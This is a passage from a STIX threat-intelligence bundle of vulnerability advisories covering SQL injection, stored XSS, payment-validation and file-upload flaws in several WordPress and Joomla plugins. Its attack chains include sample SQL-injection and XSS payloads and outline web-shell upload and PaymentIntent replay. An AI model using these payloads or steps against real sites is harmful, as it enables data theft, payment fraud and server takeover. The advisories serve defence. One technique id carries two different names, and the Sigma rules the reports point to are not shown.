      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c23c18f6-a312-5b86-bf97-f91fb6a0d188",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a41dc97e-8f50-522a-8d4c-ebe7927246b1",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stolen Data",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee4e5895-898a-59d3-875b-5930aa5729b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a41dc97e-8f50-522a-8d4c-ebe7927246b1",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a41dc97e-8f50-522a-8d4c-ebe7927246b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-6854 - WordPress My Calendar Plugin Time-Based Blind SQL Injection",
      "description": "## Overview\n\nThe My Calendar - Accessible Event Manager plugin for WordPress is affected by CVE-2026-6854, a critical time-based blind SQL Injection vulnerability. This flaw impacts all versions of the plugin up to and including 3.7.8. The vulnerability originates from insufficient input sanitization of the `mc_auth` parameter and inadequate preparation of existing SQL queries. This allows unauthenticated attackers to append malicious SQL statements, enabling them to illicitly extract sensitive data from the underlying database. The vulnerability poses a significant risk to the confidentiality of information stored on affected WordPress sites. Attackers can leverage this to gain unauthorized access to user data, configuration details, and other proprietary information, leading to potential data breaches and compliance issues.\n\n## Attack Chain\n\n1. **Initial Access**: An unauthenticated attacker identifies a WordPress site running the vulnerable My Calendar plugin (version 3.7.8 or below).\n2. **Reconnaissance**: The attacker analyzes HTTP requests related to the My Calendar plugin, specifically identifying the `mc_auth` parameter.\n3. **Payload Crafting**: The attacker constructs a malicious time-based blind SQL Injection payload designed to interact with the database through the `mc_auth` parameter. This payload typically includes database functions like `SLEEP()` or `WAITFOR DELAY` combined with conditional statements to infer information character by character.\n4. **Exploitation Request**: The attacker sends a specially crafted HTTP GET or POST request to the vulnerable WordPress endpoint, embedding the SQL injection payload within the `mc_auth` parameter.\n5. **Database Interaction**: The WordPress application processes the request, and due to insufficient sanitization, the malicious SQL payload is executed by the backend database.\n6. **Information Exfiltration**: By observing the response times of multiple such requests, the attacker can systematically infer characters of the database content (e.g., user credentials, sensitive configurations) without direct error messages or visible output.\n7. **Data Collection**: The attacker continues this process to extract specific sensitive information, such as administrator hashes, API keys, or customer data, from the database.\n8. **Impact**: The extracted sensitive data can then be used for further attacks, identity theft, or sold on illicit markets, leading to severe data breaches and financial/reputational damage.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-6854 allows unauthenticated attackers to extract sensitive information from the affected WordPress site's database. This includes, but is not limited to, user credentials, personal identifiable information (PII), configuration details, and other proprietary data. The impact on victims is severe, potentially leading to widespread data breaches, financial losses due to regulatory fines or remediation efforts, and significant reputational damage. While no specific victim counts are available, the broad adoption of WordPress plugins suggests a substantial number of organizations could be at risk if they are using the vulnerable plugin version.\n\n## Recommendation\n\n* **Patch CVE-2026-6854**: Immediately update the My Calendar - Accessible Event Manager plugin to version 3.7.9 or later to remediate CVE-2026-6854.\n* **Deploy WAF Rules**: Implement and tune Web Application Firewall (WAF) rules to detect and block SQL Injection attempts, especially those targeting common SQL functions like `SLEEP` or `WAITFOR DELAY` within URI queries or POST bodies.\n* **Monitor Web Logs**: Deploy the Sigma rule below to your SIEM to detect potential exploitation attempts for CVE-2026-6854 by monitoring web server access logs for suspicious patterns in the `mc_auth` parameter.\n",
      "published": "2026-07-08T12:21:22Z",
      "labels": [
        "wordpress",
        "sql-injection",
        "vulnerability",
        "web-application",
        "collection",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6854"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be1750ae-2659-57d5-a5d1-6419aa6d1e94",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1f830e0c-5f13-56e9-9df7-7938d40d5231",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1f830e0c-5f13-56e9-9df7-7938d40d5231",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-6230: Tainacan WordPress Plugin SQL Injection Vulnerability",
      "description": "## Overview\n\nCVE-2026-6230 details a critical time-based blind SQL Injection vulnerability impacting the Tainacan plugin for WordPress, affecting all versions up to and including 1.0.3. This flaw originates from inadequate sanitization and escaping of user-supplied input to the 'geoquery' parameter, coupled with insufficient preparation of the underlying SQL query. The vulnerability allows unauthenticated attackers to inject malicious SQL code, thereby extending existing database queries. This enables attackers to systematically extract sensitive data from the WordPress database, potentially compromising user credentials, content, and configuration information. The severity is rated with a CVSS 3.1 Base Score of 7.5 (High), emphasizing the significant risk of data confidentiality loss.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a WordPress site running a vulnerable version (\u003c= 1.0.3) of the Tainacan plugin.\n2. The attacker sends an HTTP GET or POST request to the vulnerable WordPress site, targeting an endpoint that processes the `geoquery` parameter.\n3. The attacker crafts a malicious `geoquery` parameter containing time-based blind SQL injection payloads, such as `SLEEP()` or `BENCHMARK()`, designed to introduce delays in database responses based on logical conditions.\n4. The Tainacan plugin insecurely concatenates the attacker-supplied `geoquery` input directly into an SQL statement without proper escaping or parameterized queries.\n5. The database server executes the malformed SQL query, causing a noticeable delay in the HTTP response if the injected conditional statement evaluates to true.\n6. By iteratively modifying the injected SQL payload and observing the server's response times, the attacker can infer characters, one by one, to systematically exfiltrate sensitive data (e.g., user hashes, API keys, intellectual property) from the database.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-6230 allows unauthenticated attackers to perform time-based blind SQL injection, leading to the exfiltration of sensitive information from the database. This could include administrator credentials, user data, private content, and site configuration details. The lack of authentication required for exploitation means a wide range of WordPress sites utilizing the Tainacan plugin are at risk. The primary damage is to data confidentiality, which can result in significant reputational harm, regulatory fines, and further compromise of the affected organization's systems.\n\n## Recommendation\n\n* Immediately update the Tainacan plugin for WordPress to version 1.0.4 or higher to patch CVE-2026-6230, which includes commit `579d28d7752b27ed3407f5197abb6349b3efc3c9`.\n* Deploy the Sigma rule \"Detect CVE-2026-6230 Exploitation - Tainacan Plugin SQL Injection\" to your SIEM to detect attempts to exploit this vulnerability.\n* Enable comprehensive webserver logging (e.g., Apache access logs, Nginx access logs) to capture full URI and query string details for `webserver` category rules.\n",
      "published": "2026-07-08T12:25:59Z",
      "labels": [
        "wordpress",
        "sql-injection",
        "webserver",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6230"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/tainacan/tainacan/commit/579d28d7752b27ed3407f5197abb6349b3efc3c9"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/241d9cd3-9331-49b2-8083-dc646070488e?source=cve"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--160fdc6c-3f49-51cb-b058-3c616e7df8d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bdd4bb00-e864-554f-8dd0-d1b98cf691fe",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bdd4bb00-e864-554f-8dd0-d1b98cf691fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical SQL Injection in Webbeyaz Web Design Mediküm Web (CVE-2026-8307)",
      "description": "## Overview\n\nCVE-2026-8307 details a critical SQL injection vulnerability impacting Webbeyaz Web Design's Mediküm Web application. This flaw stems from the improper neutralization of special elements within SQL commands, enabling attackers to inject malicious SQL queries. Rated with a CVSS v3.1 base score of 9.8 (CRITICAL), this vulnerability could lead to severe consequences, including unauthorized data access, modification, or deletion, and potentially remote code execution. The vulnerability affects all versions of Mediküm Web up to and including July 8, 2026. Alarmingly, the vendor, Webbeyaz Web Design, has confirmed that Mediküm Web is no longer a supported product, meaning no official patches or security updates will be released to address this critical weakness, leaving affected systems highly exposed to exploitation.\n\n## Attack Chain\n\n1. **Identify Target**: Attacker identifies a Webbeyaz Web Design Mediküm Web application instance on the internet.\n2. **Vulnerability Scanning**: Attacker uses automated tools or manual methods to probe web application parameters (e.g., URL query strings, POST data, HTTP headers) for SQL injection vulnerabilities.\n3. **Payload Injection**: Malicious SQL payload, such as ' OR 1=1 --, ' UNION SELECT ..., or blind SQLi techniques, is inserted into an unsanitized input field.\n4. **Backend Processing**: The vulnerable Mediküm Web application concatenates the malicious input directly into a database query.\n5. **SQL Execution**: The database server executes the modified query, which now includes the attacker's commands.\n6. **Information Disclosure/Manipulation**: The attacker leverages the vulnerability to extract sensitive data (e.g., user credentials, financial records), bypass authentication, or modify database entries.\n7. **System Compromise (Potential)**: Depending on database privileges and underlying system configuration, the attacker might achieve command execution on the host server, leading to full system compromise.\n8. **Data Exfiltration/Impact**: Attacker exfiltrates sensitive data or proceeds with further malicious activities, achieving confidentiality, integrity, and availability impact.\n\n## Impact\n\nThe critical SQL injection vulnerability (CVE-2026-8307) in Webbeyaz Web Design Mediküm Web poses a severe risk to organizations utilizing this unsupported product. Successful exploitation can lead to complete compromise of the underlying database, allowing attackers to access, modify, or delete sensitive information, including customer data, intellectual property, or operational details. This could result in significant data breaches, reputational damage, regulatory fines, and operational disruption. Due to the product being unsupported, organizations using Mediküm Web are left with no official patching options, making them persistent targets for sophisticated and opportunistic attackers.\n\n## Recommendation\n\n* Immediately identify and inventory all instances of Webbeyaz Web Design Mediküm Web within your environment.\n* Isolate any identified Mediküm Web instances from internet exposure and critical internal networks, or decommission them if feasible, given the lack of vendor support.\n* Deploy the provided Sigma rule to your SIEM/EDR to detect common webserver log patterns indicative of CVE-2026-8307 exploitation attempts.\n* Implement a Web Application Firewall (WAF) with robust SQL injection detection and prevention capabilities in front of any active Mediküm Web instances.\n* Conduct a comprehensive audit of database access controls for any system connected to Mediküm Web to ensure least privilege principles are enforced, limiting potential damage from compromise.\n",
      "published": "2026-07-08T13:19:18Z",
      "labels": [
        "sql-injection",
        "web-application",
        "critical-vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8307"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0518"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7f05b09-f49b-5ad7-b047-5226d15af0f2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3852609b-314f-5e30-a886-a2332edec636",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb83bf13-6e5a-5a1b-95a0-c72f328328b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3852609b-314f-5e30-a886-a2332edec636",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3852609b-314f-5e30-a886-a2332edec636",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-5356: LatePoint WordPress Plugin Improper Input Validation Leading to Arbitrary Payments",
      "description": "## Overview\n\nThe LatePoint - Calendar Booking Plugin for Appointments and Events for WordPress, version 5.4.0 and earlier, contains a critical Improper Input Validation vulnerability (CVE-2026-5356). Discovered and published on July 8, 2026, this flaw allows unauthenticated attackers to exploit the plugin's Stripe Connect payment processor. By supplying a previously succeeded PaymentIntent ID from any legitimate Stripe transaction, attackers can effectively bypass authorization checks and force the system to process an arbitrary payment. This vulnerability is due to the plugin accepting client-supplied PaymentIntent IDs without sufficient re-validation, posing a significant risk of financial fraud and impacting the integrity of transactions for organizations utilizing the affected plugin versions.\n\n## Attack Chain\n\n1. An attacker identifies a WordPress website utilizing the LatePoint - Calendar Booking Plugin for Appointments and Events, specifically versions up to and including 5.4.0.\n2. The attacker identifies the specific endpoint for the plugin's Stripe Connect payment processor that handles PaymentIntent IDs.\n3. The attacker performs a legitimate, small-value transaction using Stripe (or obtains a PaymentIntent ID from a different source) to acquire a previously succeeded PaymentIntent ID.\n4. The attacker crafts a malicious HTTP request to the vulnerable LatePoint Stripe endpoint, injecting the legitimately obtained, succeeded PaymentIntent ID.\n5. Due to the Improper Input Validation (CWE-862) in the plugin, the crafted request bypasses intended authorization checks within the plugin's logic.\n6. The LatePoint plugin's Stripe Connect payment processor accepts and processes the client-supplied PaymentIntent ID as a valid transaction without proper re-validation.\n7. The website's payment system registers an arbitrary payment amount, effectively defrauding the service or manipulating its financial records using the attacker's supplied PaymentIntent token.\n\n## Impact\n\nThe primary impact of CVE-2026-5356 is the potential for significant financial fraud against organizations running the vulnerable LatePoint plugin. Unauthenticated attackers can cause arbitrary amounts to be processed, leading to direct monetary loss, fraudulent bookings, and manipulated financial records. This can result in financial discrepancies, chargebacks, reputational damage for businesses, and a loss of trust from customers. The vulnerability affects all versions up to and including 5.4.0, implying a potentially wide scope of affected WordPress installations.\n\n## Recommendation\n\n* Patch CVE-2026-5356 by updating the LatePoint - Calendar Booking Plugin for Appointments and Events to a version greater than 5.4.0 immediately.\n* Monitor web server access logs for repeated or unusual requests to payment processing endpoints within the LatePoint plugin directory, using `logsource: category: webserver`.\n* Audit financial transaction records and Stripe logs for any unauthorized or anomalous PaymentIntent usages, which could indicate successful exploitation of the vulnerability described in CVE-2026-5356.\n",
      "published": "2026-07-08T13:20:18Z",
      "labels": [
        "wordpress",
        "plugin",
        "vulnerability",
        "webserver",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5356"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1b1338c4-36a8-47b0-b3cf-c5dc690f8c1c?source=cve"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/changeset/3509569/latepoint"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a90fd30f-c7d3-573a-be65-1f18fb44bd4b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12502239-5426-583d-a25d-f29e460f29ca",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee8ce8ac-34e8-56a5-8c1c-d2a524f2777d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12502239-5426-583d-a25d-f29e460f29ca",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--12502239-5426-583d-a25d-f29e460f29ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-6820: VikBooking WordPress Plugin Stored XSS Vulnerability",
      "description": "## Overview\n\nA critical vulnerability, identified as CVE-2026-6820, has been discovered in the VikBooking Hotel Booking Engine \u0026 PMS plugin for WordPress, affecting all versions up to and including 1.8.8. This Stored Cross-Site Scripting (XSS) flaw stems from insufficient input sanitization and output escaping of the 'email' parameter. Unauthenticated attackers can exploit this by injecting malicious web scripts into the plugin's data. These scripts are then persistently stored and subsequently executed in the browsers of legitimate users or administrators who access an affected page. The vulnerability, publicly disclosed on July 8, 2026, poses a significant risk to websites using the plugin, potentially leading to session hijacking, defacement, or further client-side exploitation without requiring any prior authentication from the attacker.\n\n## Attack Chain\n\n1. An unauthenticated attacker crafts an HTTP POST request targeting a WordPress endpoint handled by the VikBooking plugin (e.g., a booking form submission or a profile update function accessible to unauthenticated users).\n2. The attacker embeds a malicious JavaScript payload within the 'email' parameter of this POST request, for instance, `\u003cscript\u003ealert('XSS');\u003c/script\u003e`.\n3. Due to inadequate input validation, the VikBooking plugin processes and stores this unsanitized 'email' parameter, including the embedded script, into the WordPress database.\n4. The malicious script becomes persistently stored on the server as part of the plugin's data, associated with a booking or user entry.\n5. A legitimate user or administrator subsequently navigates to a WordPress page (e.g., a booking details page, an admin panel view) that retrieves and displays the compromised 'email' parameter from the database.\n6. When the affected page loads in the victim's browser, the stored malicious JavaScript payload is executed within the context of the victim's session.\n7. This client-side execution can lead to session hijacking (e.g., cookie theft), redirection to malicious sites, defacement of the webpage, or the download and execution of further malware.\n8. The attacker achieves their objective, potentially gaining unauthorized access to sensitive information or control over the victim's session.\n\n## Impact\n\nThe successful exploitation of CVE-2026-6820 can lead to severe consequences for organizations utilizing the VikBooking Hotel Booking Engine \u0026 PMS plugin. Attackers can hijack administrator sessions, leading to full compromise of the WordPress site, including data exfiltration, website defacement, or malware distribution to visitors. For regular users, session hijacking could expose personal booking details or lead to credential theft via phishing. Given the plugin's function, hospitality businesses and any entity managing bookings online are particularly vulnerable. While no specific victim count is available, the widespread use of WordPress and its plugins suggests a significant potential attack surface, impacting reputation, data privacy, and operational continuity.\n\n## Recommendation\n\n1. Immediately update the VikBooking Hotel Booking Engine \u0026 PMS plugin to version 1.8.9 or higher to patch CVE-2026-6820.\n2. Deploy or update Web Application Firewall (WAF) rules to detect and block common Stored XSS payloads, specifically targeting inputs to WordPress endpoints that handle the 'email' parameter as described for CVE-2026-6820.\n3. Review web server access logs (e.g., Apache, Nginx) for HTTP POST requests to WordPress paths containing the 'email' parameter with suspicious characters, such as `\u003cscript\u003e`, `onerror=`, or `javascript:`, which could indicate exploitation attempts of CVE-2026-6820.\n4. Conduct security audits of all WordPress installations and plugins to identify and remediate similar input sanitization and output escaping vulnerabilities.\n",
      "published": "2026-07-08T13:21:24Z",
      "labels": [
        "wordpress",
        "plugin",
        "xss",
        "web-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6820"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2b4586a-f87d-4a51-8f4e-932d7254518e?source=cve"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/browser/vikbooking/tags/1.8.9/admin/controller.php#L11208"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/browser/vikbooking/tags/1.8.9/site/controller.php#L307"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9c8cb94-0591-5908-b3f3-d9a78c2ff165",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--674e2878-5a38-56f3-9bd0-56ece22fc4c1",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4a8c224e-0a0d-514e-a4dc-f80d8c7cd2bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--674e2878-5a38-56f3-9bd0-56ece22fc4c1",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--13c97945-6a97-5a43-8bc2-3e7e65c468a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--674e2878-5a38-56f3-9bd0-56ece22fc4c1",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--674e2878-5a38-56f3-9bd0-56ece22fc4c1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla Page Builder CK Arbitrary File Upload (EDB-52626)",
      "description": "## Overview\n\nA publicly available exploit (EDB-52626) has been published on Exploit-DB demonstrating an arbitrary file upload vulnerability within Joomla Page Builder CK version 3.5.10. This critical flaw allows an unauthenticated attacker to upload files of any type, including web shells, to a vulnerable Joomla instance. The presence of a functional public exploit significantly escalates the risk, making affected systems prime targets for immediate compromise. This type of vulnerability can lead to remote code execution (RCE), enabling attackers to gain full control over the compromised web server, access sensitive data, or use the server as a platform for further attacks.\n\n## Attack Chain\n\n1. **Initial Access**: An unauthenticated attacker identifies a Joomla website running Page Builder CK 3.5.10 or earlier.\n2. **Vulnerability Exploitation**: The attacker crafts a malicious HTTP POST request targeting the vulnerable file upload endpoint of Page Builder CK, bypassing file type and content validation.\n3. **Malicious File Upload**: The attacker uploads a malicious file, typically a PHP web shell (e.g., `shell.php` or `image.jpg.php`), to a publicly accessible directory on the Joomla server.\n4. **Web Shell Execution**: The attacker navigates to the URL of the uploaded web shell through a web browser or a command-line tool.\n5. **Remote Code Execution**: The web shell executes with the privileges of the web server, allowing the attacker to run arbitrary commands on the underlying operating system.\n6. **Post-Exploitation**: The attacker uses the web shell to establish persistence, exfiltrate data, pivot to other internal systems, or deploy additional malware like ransomware or crypto-miners.\n\n## Impact\n\nThe successful exploitation of this arbitrary file upload vulnerability can lead to severe consequences. Attackers can gain complete control over the compromised Joomla website and the underlying server. This includes unauthorized access to sensitive information stored on the server, website defacement, disruption of services, and the use of the server as a launchpad for further attacks within the organization's network. The availability of a public exploit increases the likelihood of widespread exploitation against unpatched Joomla installations globally, potentially impacting businesses across all sectors.\n\n## Recommendation\n\n* Immediately update Joomla Page Builder CK to a patched version to remediate EDB-52626.\n* Deploy a Web Application Firewall (WAF) to detect and block malicious file uploads and web shell execution attempts, focusing on `webserver` logs.\n* Regularly review `webserver` logs for suspicious HTTP POST requests attempting to upload unusual file types or access newly created executable files.\n* Implement file integrity monitoring on web server directories to detect unauthorized creation or modification of files, particularly those with executable extensions.\n",
      "published": "2026-07-08T13:32:40Z",
      "labels": [
        "webapps",
        "arbitrary-file-upload",
        "joomla",
        "remote-code-execution"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52626"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15bcd3f5-a53b-5100-9698-fd4cfb4ed683",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6e4d2477-de53-5acf-b9d5-e682a01da973",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6e4d2477-de53-5acf-b9d5-e682a01da973",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Krayin CRM v2.2.x Authenticated Remote Code Execution Exploit",
